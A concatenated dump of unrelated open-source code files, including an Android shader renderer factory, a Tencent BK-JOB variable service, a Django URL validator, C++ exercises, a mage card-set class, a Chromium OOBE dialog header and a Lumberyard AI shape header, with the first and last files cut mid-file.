Log.e("RendererFactory", "Shaders not found for " + shader.id);
return null;
}
// experimental: inject glPointSize
vertexShaderCode = vertexShaderCode.replace("void main(){", "void main(){\n\tgl_PointSize = 5.0;");
// use opengl constant to dynamically set up array size in shaders. That should be >=120
vertexShaderCode = vertexShaderCode.replace("const int MAX_JOINTS = 60;","const int MAX_JOINTS = gl_MaxVertexUniformVectors > 60 ? 60 : gl_MaxVertexUniformVectors;");
// create drawer
Log.v("RendererFactory", "\n---------- Vertex shader ----------\n");
Log.v("RendererFactory", vertexShaderCode);
Log.v("RendererFactory", "---------- Fragment shader ----------\n");
Log.v("RendererFactory", fragmentShaderCode);
Log.v("RendererFactory", "-------------------------------------\n");
drawer = GLES20Renderer.getInstance(shader.id, vertexShaderCode, fragmentShaderCode);
// cache drawer
drawers.put(shader, drawer);
// return drawer
return drawer;
}
@NonNull
private Shader getShader(boolean isUsingSkyBox, boolean isAnimated, boolean isUsingLights, boolean isTextured, boolean
isColoured) {
if (isUsingSkyBox){
return Shader.SKYBOX;
}
Shader ret = null;
if (isAnimated){
if (isUsingLights){
if (isTextured){
if (isColoured){
ret = Shader.ANIM_LIGHT_TEXTURE_COLORS;
} else {
ret = Shader.ANIM_LIGHT_TEXTURE;
}
} else{
if (isColoured){
ret = Shader.ANIM_LIGHT_COLORS;
} else {
ret = Shader.ANIM_LIGHT;
}
}
} else{
if (isTextured){
if (isColoured){
ret = Shader.ANIM_TEXTURE_COLORS;
} else {
ret = Shader.ANIM_TEXTURE;
}
} else{
if (isColoured){
ret = Shader.ANIM_COLORS;
} else {
ret = Shader.ANIM;
}
}
}
} else {
if (isUsingLights){
if (isTextured){
if (isColoured){
ret = Shader.LIGHT_TEXTURE_COLORS;
} else {
ret = Shader.LIGHT_TEXTURE;
}
} else{
if (isColoured){
ret = Shader.LIGHT_COLORS;
} else {
ret = Shader.LIGHT;
}
}
} else{
if (isTextured){
if (isColoured){
ret = Shader.TEXTURE_COLORS;
} else{
ret = Shader.TEXTURE;
}
} else{
if (isColoured){
ret = Shader.COLORS;
} else{
ret = Shader.SHADER;
}
}
}
}
return ret;
}
public Renderer getBoundingBoxDrawer() {
return getDrawer(null, false, false, false, false, false);
}
public Renderer getFaceNormalsDrawer() {
return getDrawer(null, false, false, false, false, false);
}
public Renderer getBasicShader() {
return getDrawer(null, false, false, false, false, false);
}
public Renderer getSkyBoxDrawer() {
return getDrawer(null, true, false, false, false, false);
}
}
| 3,525 |
578 | /*
* Tencent is pleased to support the open source community by making BK-JOB蓝鲸智云作业平台 available.
*
* Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
*
* BK-JOB蓝鲸智云作业平台 is licensed under the MIT License.
*
* License for BK-JOB蓝鲸智云作业平台:
* --------------------------------------------------------------------
* Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
* documentation files (the "Software"), to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
* to permit persons to whom the Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in all copies or substantial portions of
* the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
* THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
* CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
* IN THE SOFTWARE.
*/
package com.tencent.bk.job.execute.service.impl;
import com.tencent.bk.job.common.constant.TaskVariableTypeEnum;
import com.tencent.bk.job.execute.common.constants.StepExecuteTypeEnum;
import com.tencent.bk.job.execute.dao.StepInstanceVariableDAO;
import com.tencent.bk.job.execute.engine.model.TaskVariableDTO;
import com.tencent.bk.job.execute.engine.model.TaskVariablesAnalyzeResult;
import com.tencent.bk.job.execute.model.HostVariableValuesDTO;
import com.tencent.bk.job.execute.model.StepInstanceBaseDTO;
import com.tencent.bk.job.execute.model.StepInstanceVariableValuesDTO;
import com.tencent.bk.job.execute.model.VariableValueDTO;
import com.tencent.bk.job.execute.service.StepInstanceVariableValueService;
import com.tencent.bk.job.execute.service.TaskInstanceService;
import com.tencent.bk.job.execute.service.TaskInstanceVariableService;
import lombok.extern.slf4j.Slf4j;
import org.apache.commons.collections4.CollectionUtils;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;
import java.util.ArrayList;
import java.util.Comparator;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.stream.Collectors;
@Service
@Slf4j
public class StepInstanceVariableValueServiceImpl implements StepInstanceVariableValueService {
private final StepInstanceVariableDAO stepInstanceVariableDAO;
private final TaskInstanceService taskInstanceService;
private final TaskInstanceVariableService taskInstanceVariableService;
@Autowired
public StepInstanceVariableValueServiceImpl(StepInstanceVariableDAO stepInstanceVariableDAO,
TaskInstanceService taskInstanceService,
TaskInstanceVariableService taskInstanceVariableService) {
this.stepInstanceVariableDAO = stepInstanceVariableDAO;
this.taskInstanceService = taskInstanceService;
this.taskInstanceVariableService = taskInstanceVariableService;
}
@Override
public void saveVariableValues(StepInstanceVariableValuesDTO variableValues) {
stepInstanceVariableDAO.saveVariableValues(variableValues);
}
@Override
public List<StepInstanceVariableValuesDTO> computeOutputVariableValuesForAllStep(long taskInstanceId) {
List<StepInstanceVariableValuesDTO> resultStepInstanceVariableValuesList = new ArrayList<>();
List<StepInstanceBaseDTO> stepInstanceList =
taskInstanceService.listStepInstanceByTaskInstanceId(taskInstanceId);
if (CollectionUtils.isEmpty(stepInstanceList)) {
log.info("Step instance is empty! taskInstanceId: {}", taskInstanceId);
return resultStepInstanceVariableValuesList;
}
List<StepInstanceVariableValuesDTO> stepInstanceVariableValuesList =
stepInstanceVariableDAO.listStepOutputVariableValuesByTaskInstanceId(taskInstanceId);
List<TaskVariableDTO> globalVars = taskInstanceVariableService.getByTaskInstanceId(taskInstanceId);
if (CollectionUtils.isEmpty(globalVars)) {
return resultStepInstanceVariableValuesList;
}
Map<String, VariableValueDTO> globalVarValueMap = new HashMap<>();
initGlobalVarMap(globalVars, globalVarValueMap);
stepInstanceList.forEach(stepInstance -> {
if (!StepExecuteTypeEnum.EXECUTE_SCRIPT.getValue().equals(stepInstance.getExecuteType())) {
return;
}
StepInstanceVariableValuesDTO resultStepInstanceVariableValues = new StepInstanceVariableValuesDTO();
resultStepInstanceVariableValues.setStepInstanceId(stepInstance.getId());
resultStepInstanceVariableValues.setExecuteCount(stepInstance.getExecuteCount());
List<VariableValueDTO> globalVarValues = new ArrayList<>();
List<StepInstanceVariableValuesDTO> variableValuesForStep = stepInstanceVariableValuesList.stream()
.filter(stepInstanceVariableValues ->
stepInstanceVariableValues.getStepInstanceId() == stepInstance.getId())
.sorted(Comparator.comparingInt(StepInstanceVariableValuesDTO::getExecuteCount))
.collect(Collectors.toList());
variableValuesForStep.forEach(variableValues -> {
if (CollectionUtils.isNotEmpty(variableValues.getGlobalParams())) {
variableValues.getGlobalParams().forEach(globalVar -> globalVarValueMap.put(globalVar.getName(),
globalVar));
}
});
if (!globalVarValueMap.isEmpty()) {
globalVarValueMap.forEach((varName, value) -> globalVarValues.add(value));
resultStepInstanceVariableValues.setGlobalParams(globalVarValues);
resultStepInstanceVariableValues.setGlobalParamsMap(new HashMap<>(globalVarValueMap));
}
resultStepInstanceVariableValuesList.add(resultStepInstanceVariableValues);
});
return resultStepInstanceVariableValuesList;
}
@Override
public StepInstanceVariableValuesDTO computeInputStepInstanceVariableValues(long taskInstanceId,
long stepInstanceId,
List<TaskVariableDTO> taskVariables) {
TaskVariablesAnalyzeResult variablesAnalyzeResult = new TaskVariablesAnalyzeResult(taskVariables);
StepInstanceVariableValuesDTO inputStepInstanceVariableValues = new StepInstanceVariableValuesDTO();
inputStepInstanceVariableValues.setTaskInstanceId(taskInstanceId);
inputStepInstanceVariableValues.setStepInstanceId(stepInstanceId);
if (!variablesAnalyzeResult.isExistAnyVar()) {
return inputStepInstanceVariableValues;
}
List<HostVariableValuesDTO> namespaceVarValues = new ArrayList<>();
List<VariableValueDTO> globalVarValues = new ArrayList<>();
Map<String, VariableValueDTO> globalVarValueMap = new HashMap<>();
Map<String, Map<String, VariableValueDTO>> namespaceVarValueMap = new HashMap<>();
inputStepInstanceVariableValues.setNamespaceParams(namespaceVarValues);
inputStepInstanceVariableValues.setNamespaceParamsMap(namespaceVarValueMap);
inputStepInstanceVariableValues.setGlobalParams(globalVarValues);
inputStepInstanceVariableValues.setGlobalParamsMap(globalVarValueMap);
initGlobalVarMap(taskVariables, globalVarValueMap);
if (variablesAnalyzeResult.isExistOnlyConstVar()) {
if (!globalVarValueMap.isEmpty()) {
globalVarValueMap.forEach((paramName, param) -> globalVarValues.add(param));
}
return inputStepInstanceVariableValues;
}
List<StepInstanceVariableValuesDTO> stepInstanceVariableValuesList =
stepInstanceVariableDAO.listSortedPreStepOutputVariableValues(taskInstanceId, stepInstanceId);
if (CollectionUtils.isEmpty(stepInstanceVariableValuesList)) {
if (!globalVarValueMap.isEmpty()) {
globalVarValueMap.forEach((paramName, param) -> globalVarValues.add(param));
}
return inputStepInstanceVariableValues;
}
stepInstanceVariableValuesList.forEach(stepInstanceVariableValues -> {
List<VariableValueDTO> stepGlobalParams = stepInstanceVariableValues.getGlobalParams();
if (CollectionUtils.isNotEmpty(stepGlobalParams)) {
stepGlobalParams.forEach(globalParam -> globalVarValueMap.put(globalParam.getName(), globalParam));
}
if (variablesAnalyzeResult.isExistNamespaceVar()) {
List<HostVariableValuesDTO> stepNamespaceParams = stepInstanceVariableValues.getNamespaceParams();
if (CollectionUtils.isNotEmpty(stepNamespaceParams)) {
stepNamespaceParams.forEach(hostVariableValues -> {
if (CollectionUtils.isEmpty(hostVariableValues.getValues())) {
return;
}
Map<String, VariableValueDTO> hostVariables = namespaceVarValueMap.computeIfAbsent(
hostVariableValues.getIp(), k -> new HashMap<>());
hostVariableValues.getValues().forEach(variable -> hostVariables.put(variable.getName(),
variable));
});
}
}
});
if (!globalVarValueMap.isEmpty()) {
globalVarValueMap.forEach((paramName, param) -> globalVarValues.add(param));
}
if (variablesAnalyzeResult.isExistNamespaceVar()) {
namespaceVarValueMap.forEach((ip, param) -> {
HostVariableValuesDTO hostVariableValues = new HostVariableValuesDTO();
hostVariableValues.setIp(ip);
if (param != null && !param.isEmpty()) {
List<VariableValueDTO> values = new ArrayList<>();
param.forEach((paramName, paramValue) -> values.add(paramValue));
hostVariableValues.setValues(values);
}
namespaceVarValues.add(hostVariableValues);
});
}
return inputStepInstanceVariableValues;
}
private void initGlobalVarMap(List<TaskVariableDTO> taskVariables,
Map<String, VariableValueDTO> globalVarValueMap) {
taskVariables.forEach(taskVariable -> {
VariableValueDTO variableValue = new VariableValueDTO();
variableValue.setName(taskVariable.getName());
variableValue.setType(taskVariable.getType());
variableValue.setValue(taskVariable.getValue());
variableValue.setServerValue(taskVariable.getTargetServers());
if (TaskVariableTypeEnum.valOf(taskVariable.getType()) != TaskVariableTypeEnum.NAMESPACE) {
globalVarValueMap.put(variableValue.getName(), variableValue);
}
});
}
}
| 4,479 |
3,102 | int h_chain(int x) {
return x * 2;
}
namespace chns {
int chf3(int x);
int chf2(int x) {
return chf3(x);
}
class chcls {
public:
int chf4(int x);
};
int chcls::chf4(int x) {
return x * 3;
}
}
| 105 |
10,225 | <gh_stars>1000+
package io.quarkus.vertx.web.runtime;
import java.util.function.Consumer;
import io.vertx.ext.web.RoutingContext;
public final class UniFailureCallback implements Consumer<Throwable> {
private final RoutingContext context;
public UniFailureCallback(RoutingContext context) {
this.context = context;
}
@Override
public void accept(Throwable t) {
context.fail(t);
}
}
| 151 |
32,544 | <gh_stars>1000+
package com.baeldung.undeclared;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
@SpringBootApplication
public class UndeclaredApplication {
public static void main(String[] args) {
SpringApplication.run(UndeclaredApplication.class, args);
}
}
| 111 |
1,312 | from django.conf import settings
from django.core import validators
class BookmarkURLValidator(validators.URLValidator):
"""
Extends default Django URLValidator and cancels validation if it is disabled in settings.
This allows to switch URL validation on/off dynamically which helps with testing
"""
def __call__(self, value):
if settings.LD_DISABLE_URL_VALIDATION:
return
super().__call__(value) | 146 |
545 | <reponame>FWangTrading/Cpp-Primer-5th-Exercises
#include <iostream>
class SmallInt {
friend SmallInt operator+(const SmallInt&, const SmallInt&);
public:
SmallInt(int = 0) { } // conversion from int
operator int() const { return val; } // conversion to int
private:
std::size_t val;
};
SmallInt operator+(const SmallInt&, const SmallInt&) {
std::cout << "operator+(const SmallInt&, const SmallInt&)" << std::endl;
return SmallInt();
}
int main() {
SmallInt s1;
//double d = s1 + 3.14; // Error
// both `operator+(const SmallInt&, const SmallInt&)` and
// `built-in operator+(int, double)` are viable functions
double d = static_cast<double>(s1) + 3.14; // OK
// We can use `static_cast` convert `s1` from `SmallInt` to `double`
double d2 = s1 + SmallInt(3.14); // OK, but lose precision
// Or use conversion constructor convert `3.14` from `double` to `SmallInt`
return 0;
}
| 316 |
1,444 | <reponame>amc8391/mage
package mage.sets;
import mage.cards.ExpansionSet;
import mage.constants.Rarity;
import mage.constants.SetType;
/**
* https://scryfall.com/sets/md1
*/
public class ModernEventDeck2014 extends ExpansionSet {
private static final ModernEventDeck2014 instance = new ModernEventDeck2014();
public static ModernEventDeck2014 getInstance() {
return instance;
}
private ModernEventDeck2014() {
super("Modern Event Deck 2014", "MD1", ExpansionSet.buildDate(2014, 5, 30), SetType.PROMOTIONAL);
this.hasBoosters = false;
this.hasBasicLands = true;
cards.add(new SetCardInfo("Burrenton Forge-Tender", 22, Rarity.UNCOMMON, mage.cards.b.BurrentonForgeTender.class));
cards.add(new SetCardInfo("Caves of Koilos", 14, Rarity.RARE, mage.cards.c.CavesOfKoilos.class));
cards.add(new SetCardInfo("City of Brass", 15, Rarity.RARE, mage.cards.c.CityOfBrass.class));
cards.add(new SetCardInfo("Dismember", 25, Rarity.UNCOMMON, mage.cards.d.Dismember.class));
cards.add(new SetCardInfo("Duress", 23, Rarity.COMMON, mage.cards.d.Duress.class));
cards.add(new SetCardInfo("Elspeth, Knight-Errant", 13, Rarity.MYTHIC, mage.cards.e.ElspethKnightErrant.class));
cards.add(new SetCardInfo("Ghost Quarter", 26, Rarity.UNCOMMON, mage.cards.g.GhostQuarter.class));
cards.add(new SetCardInfo("Honor of the Pure", 6, Rarity.RARE, mage.cards.h.HonorOfThePure.class));
cards.add(new SetCardInfo("Inquisition of Kozilek", 4, Rarity.UNCOMMON, mage.cards.i.InquisitionOfKozilek.class));
cards.add(new SetCardInfo("Intangible Virtue", 7, Rarity.UNCOMMON, mage.cards.i.IntangibleVirtue.class));
cards.add(new SetCardInfo("Isolated Chapel", 16, Rarity.RARE, mage.cards.i.IsolatedChapel.class));
cards.add(new SetCardInfo("Kataki, War's Wage", 24, Rarity.RARE, mage.cards.k.KatakiWarsWage.class));
cards.add(new SetCardInfo("Lingering Souls", 11, Rarity.UNCOMMON, mage.cards.l.LingeringSouls.class));
cards.add(new SetCardInfo("Path to Exile", 3, Rarity.UNCOMMON, mage.cards.p.PathToExile.class));
cards.add(new SetCardInfo("Plains", 19, Rarity.LAND, mage.cards.basiclands.Plains.class));
cards.add(new SetCardInfo("Raise the Alarm", 8, Rarity.COMMON, mage.cards.r.RaiseTheAlarm.class));
cards.add(new SetCardInfo("Relic of Progenitus", 21, Rarity.UNCOMMON, mage.cards.r.RelicOfProgenitus.class));
cards.add(new SetCardInfo("Shrine of Loyal Legions", 5, Rarity.UNCOMMON, mage.cards.s.ShrineOfLoyalLegions.class));
cards.add(new SetCardInfo("Soul Warden", 1, Rarity.COMMON, mage.cards.s.SoulWarden.class));
cards.add(new SetCardInfo("Spectral Procession", 12, Rarity.UNCOMMON, mage.cards.s.SpectralProcession.class));
cards.add(new SetCardInfo("Swamp", 20, Rarity.LAND, mage.cards.basiclands.Swamp.class));
cards.add(new SetCardInfo("Sword of Feast and Famine", 10, Rarity.MYTHIC, mage.cards.s.SwordOfFeastAndFamine.class));
cards.add(new SetCardInfo("Tidehollow Sculler", 2, Rarity.UNCOMMON, mage.cards.t.TidehollowSculler.class));
cards.add(new SetCardInfo("Vault of the Archangel", 17, Rarity.RARE, mage.cards.v.VaultOfTheArchangel.class));
cards.add(new SetCardInfo("Windbrisk Heights", 18, Rarity.RARE, mage.cards.w.WindbriskHeights.class));
cards.add(new SetCardInfo("Zealous Persecution", 9, Rarity.UNCOMMON, mage.cards.z.ZealousPersecution.class));
}
}
| 1,362 |
568 | //
// Copyright (c) 2009, <NAME>
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice,
// this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above copyright notice,
// this list of conditions and the following disclaimer in the documentation
// and/or other materials provided with the distribution.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
// ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
// LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
// SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
// INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
// CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//
#ifndef RL_UTIL_IO_BASICIOSRESTORER_H
#define RL_UTIL_IO_BASICIOSRESTORER_H
#include <ios>
namespace rl
{
namespace util
{
namespace io
{
template<typename CharT, typename Traits = ::std::char_traits<CharT>>
class BasicIosRestorer
{
public:
typedef ::std::basic_ios<CharT, Traits> value_type;
explicit BasicIosRestorer(value_type& ios) :
exceptions(ios.exceptions()),
fill(ios.fill()),
flags(ios.flags()),
ios(ios),
precision(ios.precision()),
rdbuf(ios.rdbuf()),
rdstate(ios.rdstate()),
tie(ios.tie()),
width(ios.width())
{
}
~BasicIosRestorer()
{
this->ios.exceptions(this->exceptions);
this->ios.fill(this->fill);
this->ios.flags(this->flags);
this->ios.precision(this->precision);
this->ios.rdbuf(this->rdbuf);
this->ios.clear(this->rdstate);
this->ios.tie(this->tie);
this->ios.width(this->width);
}
protected:
private:
const typename value_type::iostate exceptions;
const typename value_type::char_type fill;
const typename value_type::fmtflags flags;
value_type& ios;
const typename ::std::streamsize precision;
::std::basic_streambuf<CharT, Traits>* rdbuf;
const typename value_type::iostate rdstate;
::std::basic_ostream<CharT, Traits>* tie;
const typename ::std::streamsize width;
};
}
}
}
#endif // RL_UTIL_IO_BASICIOSRESTORER_H
| 1,116 |
2,151 | <reponame>aiw-google/openweave-core
/*
* Copyright (c) 2004 World Wide Web Consortium, (Massachusetts Institute of
* Technology, Institut National de Recherche en Informatique et en
* Automatique, Keio University). All Rights Reserved. This program is
* distributed under the W3C's Software Intellectual Property License. This
* program is distributed in the hope that it will be useful, but WITHOUT ANY
* WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
* FOR A PARTICULAR PURPOSE. See W3C License
* http://www.w3.org/Consortium/Legal/ for more details.
*/
package org.w3c.domts;
import java.util.ArrayList;
import java.util.List;
import org.w3c.dom.Node;
import org.w3c.dom.UserDataHandler;
/**
* This is a utility implementation of UserDataHandler that captures all
* notifications
*/
public class UserDataMonitor
implements UserDataHandler {
private final List notifications = new ArrayList();
/**
* Public constructor
*
*/
public UserDataMonitor() {
}
/**
* Implementation of UserDataHandler.handle. Creates a UserDataNotification
* for later testing
*
* @param operation
* See org.w3c.dom.UserDataHandler
* @param key
* See org.w3c.dom.UserDataHandler
* @param data
* See org.w3c.dom.UserDataHandler
* @param src
* See org.w3c.dom.UserDataHandler
* @param dst
* See org.w3c.dom.UserDataHandler
*/
public void handle(
short operation,
String key,
Object data,
Node src,
Node dst) {
notifications.add(
new UserDataNotification(operation, key, data, src, dst));
}
/**
* Gets list of notifications
*
* @return List of notifications, may not be null.
*/
public final List getAllNotifications() {
return new ArrayList(notifications);
}
}
| 647 |
496 | <filename>src/mydis/Operator.cpp
/*******************************************************************************
* Project: Nebula
* @file Operator.cpp
* @brief
* @author Bwar
* @date: 2016年8月17日
* @note
* Modify history:
******************************************************************************/
#include "Operator.hpp"
namespace neb
{
Operator::Operator()
{
}
Operator::~Operator()
{
}
} /* namespace neb */
| 132 |
575 | <reponame>iridium-browser/iridium-browser<gh_stars>100-1000
// Copyright 2018 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef CHROME_BROWSER_ASH_LOGIN_UI_OOBE_UI_DIALOG_DELEGATE_H_
#define CHROME_BROWSER_ASH_LOGIN_UI_OOBE_UI_DIALOG_DELEGATE_H_
#include <string>
#include "ash/public/cpp/login_accelerators.h"
#include "ash/public/cpp/login_types.h"
#include "ash/public/cpp/system_tray_observer.h"
#include "base/macros.h"
#include "base/memory/weak_ptr.h"
#include "base/scoped_observation.h"
#include "chrome/browser/ash/login/screens/error_screen.h"
#include "chrome/browser/ui/ash/keyboard/chrome_keyboard_controller_client.h"
#include "chrome/browser/ui/ash/login_screen_client.h"
#include "chrome/browser/ui/chrome_web_modal_dialog_manager_delegate.h"
#include "chrome/browser/ui/webui/chromeos/login/oobe_ui.h"
#include "components/web_modal/web_contents_modal_dialog_host.h"
#include "ui/views/view.h"
#include "ui/views/view_observer.h"
#include "ui/web_dialogs/web_dialog_delegate.h"
namespace content {
class WebContents;
}
namespace ui {
class Accelerator;
}
namespace views {
class WebDialogView;
class Widget;
} // namespace views
namespace chromeos {
class CaptivePortalDialogDelegate;
class LayoutWidgetDelegateView;
class LoginDisplayHostMojo;
class OobeWebDialogView;
// This class manages the behavior of the Oobe UI dialog.
// And its lifecycle is managed by the widget created in Show().
// WebDialogView<----delegate_----OobeUIDialogDelegate
// |
// |
// V
// clientView---->Widget's view hierarchy
class OobeUIDialogDelegate : public ui::WebDialogDelegate,
public ChromeKeyboardControllerClient::Observer,
public CaptivePortalWindowProxy::Observer,
public OobeUI::Observer,
public views::ViewObserver,
public ash::SystemTrayObserver {
public:
explicit OobeUIDialogDelegate(base::WeakPtr<LoginDisplayHostMojo> controller);
~OobeUIDialogDelegate() override;
// Show the dialog widget.
void Show();
// Show the dialog widget stretched to full screen.
void ShowFullScreen();
// Close the widget, and it will delete this object.
void Close();
// Hide the dialog widget, but do not shut it down.
void Hide();
// Returns whether the dialog is currently visible.
bool IsVisible();
// Update the oobe state of the dialog.
void SetState(ash::OobeDialogState state);
// Tell the dialog whether to call FixCaptivePortal next time it is shown.
void SetShouldDisplayCaptivePortal(bool should_display);
content::WebContents* GetWebContents();
OobeUI* GetOobeUI() const;
gfx::NativeWindow GetNativeWindow() const;
views::View* GetWebDialogView();
CaptivePortalDialogDelegate* captive_portal_delegate_for_test() {
return captive_portal_delegate_.get();
}
private:
// ui::WebDialogDelegate:
ui::ModalType GetDialogModalType() const override;
std::u16string GetDialogTitle() const override;
GURL GetDialogContentURL() const override;
void GetWebUIMessageHandlers(
std::vector<content::WebUIMessageHandler*>* handlers) const override;
void GetDialogSize(gfx::Size* size) const override;
std::string GetDialogArgs() const override;
// NOTE: This function starts cleanup sequence that would call FinishCleanup
// and delete this object in the end.
void OnDialogClosed(const std::string& json_retval) override;
void OnCloseContents(content::WebContents* source,
bool* out_close_dialog) override;
bool ShouldShowDialogTitle() const override;
bool HandleContextMenu(content::RenderFrameHost* render_frame_host,
const content::ContextMenuParams& params) override;
std::vector<ui::Accelerator> GetAccelerators() override;
bool AcceleratorPressed(const ui::Accelerator& accelerator) override;
// views::ViewObserver:
void OnViewBoundsChanged(views::View* observed_view) override;
void OnViewIsDeleting(views::View* observed_view) override;
// ChromeKeyboardControllerClient::Observer:
void OnKeyboardVisibilityChanged(bool visible) override;
// CaptivePortalWindowProxy::Observer:
void OnBeforeCaptivePortalShown() override;
void OnAfterCaptivePortalHidden() override;
// OobeUI::Observer:
void OnCurrentScreenChanged(OobeScreenId current_screen,
OobeScreenId new_screen) override;
void OnDestroyingOobeUI() override;
// ash::SystemTrayObserver:
void OnFocusLeavingSystemTray(bool reverse) override;
base::WeakPtr<LoginDisplayHostMojo> controller_;
base::WeakPtr<CaptivePortalDialogDelegate> captive_portal_delegate_;
// Root widget. It is assumed that widget is placed as a full-screen inside
// LockContainer.
views::Widget* widget_ = nullptr;
// Reference to view owned by widget_.
LayoutWidgetDelegateView* layout_view_ = nullptr;
// Reference to dialog view stored in widget_.
OobeWebDialogView* dialog_view_ = nullptr;
base::ScopedObservation<views::View, views::ViewObserver> view_observer_{
this};
base::ScopedObservation<ChromeKeyboardControllerClient,
ChromeKeyboardControllerClient::Observer>
keyboard_observer_{this};
base::ScopedObservation<CaptivePortalWindowProxy,
CaptivePortalWindowProxy::Observer>
captive_portal_observer_{this};
base::ScopedObservation<OobeUI, OobeUI::Observer> oobe_ui_observer_{this};
std::unique_ptr<
base::ScopedObservation<LoginScreenClient,
ash::SystemTrayObserver,
&LoginScreenClient::AddSystemTrayObserver,
&LoginScreenClient::RemoveSystemTrayObserver>>
scoped_system_tray_observer_;
std::map<ui::Accelerator, ash::LoginAcceleratorAction> accel_map_;
ash::OobeDialogState state_ = ash::OobeDialogState::HIDDEN;
// Whether the captive portal screen should be shown the next time the Gaia
// dialog is opened.
bool should_display_captive_portal_ = false;
DISALLOW_COPY_AND_ASSIGN(OobeUIDialogDelegate);
};
} // namespace chromeos
#endif // CHROME_BROWSER_ASH_LOGIN_UI_OOBE_UI_DIALOG_DELEGATE_H_
| 2,293 |
1,738 | <reponame>jeikabu/lumberyard<gh_stars>1000+
/*
* All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or
* its licensors.
*
* For complete copyright and license terms please see the LICENSE at the root of this
* distribution (the "License"). All use of this software is governed by the License,
* or, if provided, by the license below or the license accompanying this file. Do not
* remove or modify any license notices. This file is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
*
*/
// Original file Copyright Crytek GMBH or its affiliates, used under license.
// Description : Temp file holding code extracted from CAISystem.h/cpp
#ifndef CRYINCLUDE_CRYAISYSTEM_SHAPE2_H
#define CRYINCLUDE_CRYAISYSTEM_SHAPE2_H
#pragma once
class CShapeMask
{
public:
CShapeMask();
~CShapeMask();
/// Builds this mask according to pShape down to the granularity
void Build(const struct SShape* pShape, float granularity);
/// categorisation of a point according to this mask
enum EType
{
TYPE_IN, TYPE_EDGE, TYPE_OUT
};
EType GetType(const Vec3 pt) const;
size_t MemStats() const;
private:
/// used just during building
EType GetType(const struct SShape* pShape, const Vec3& min, const Vec3& max) const;
/// gets the min/max values of the 2D box indicated by i and j
void GetBox(Vec3& min, Vec3& max, int i, int j);
AABB m_aabb;
unsigned m_nx, m_ny;
float m_dx, m_dy; // number of pixels
// container bit-pair is indexed by x + y * m_bytesPerRow
unsigned m_bytesPerRow;
typedef std::vector<unsigned char> TContainer;
TContainer m_container;
};
struct SShape
{
SShape();
explicit SShape(
const ListPositions& shape_
, const AABB& aabb_
, IAISystem::ENavigationType navType = IAISystem::NAV_UNSET
, int type = 0
, bool closed_ = false
, float height_ = 0.0f
, EAILightLevel lightLevel_ = AILL_NONE
, bool temp = false
);
explicit SShape(
const ListPositions& shape_
, bool allowMask = false
, IAISystem::ENavigationType navType_ = IAISystem::NAV_UNSET
, int type_ = 0
, bool closed_ = false
, float height_ = 0.0f
, EAILightLevel lightLevel_ = AILL_NONE
, bool temp = false);
~SShape();
void RecalcAABB();
/// Builds a mask with a specified granularity
void BuildMask(float granularity);
void ReleaseMask();
// offsets this shape(called when segmented world shifts)
void OffsetShape(const Vec3& offset);
ListPositions::const_iterator NearestPointOnPath(const Vec3& pos, bool forceLoop, float& dist, Vec3& nearestPt, float* distAlongPath = 0,
Vec3* segmentDir = 0, uint32* segmentStartIndex = 0, float* pathLength = 0, float* segmentFraction = 0) const;
// Populate an array with intersection distances
// Can combine with IsPointInsideShape to establish entry/exit where appropriate
// If testHeight is true, will take the height of sides into account
// If testTopBottom is true, will test for intersection on top and bottom sides of a closed shape
int GetIntersectionDistances(const Vec3& start, const Vec3& end, float intersectDistArray[], int maxIntersections, bool testHeight = false, bool testTopBottom = false) const;
Vec3 GetPointAlongPath(float dist) const;
bool IsPointInsideShape(const Vec3& pos, bool checkHeight) const;
bool ConstrainPointInsideShape(Vec3& pos, bool checkHeight) const;
size_t MemStats() const;
ListPositions shape; /// Points describing the shape.
AABB aabb; /// Bounding box of the shape points.
IAISystem::ENavigationType navType; /// Navigation type associated with AIPaths
int type; /// AIobject/anchor type associated with an AIshape
float height; /// Height of the shape. The shape volume is described as [aabb.minz, aabb.minz+height]
float devalueTime; /// Timeout for occupied AIpaths
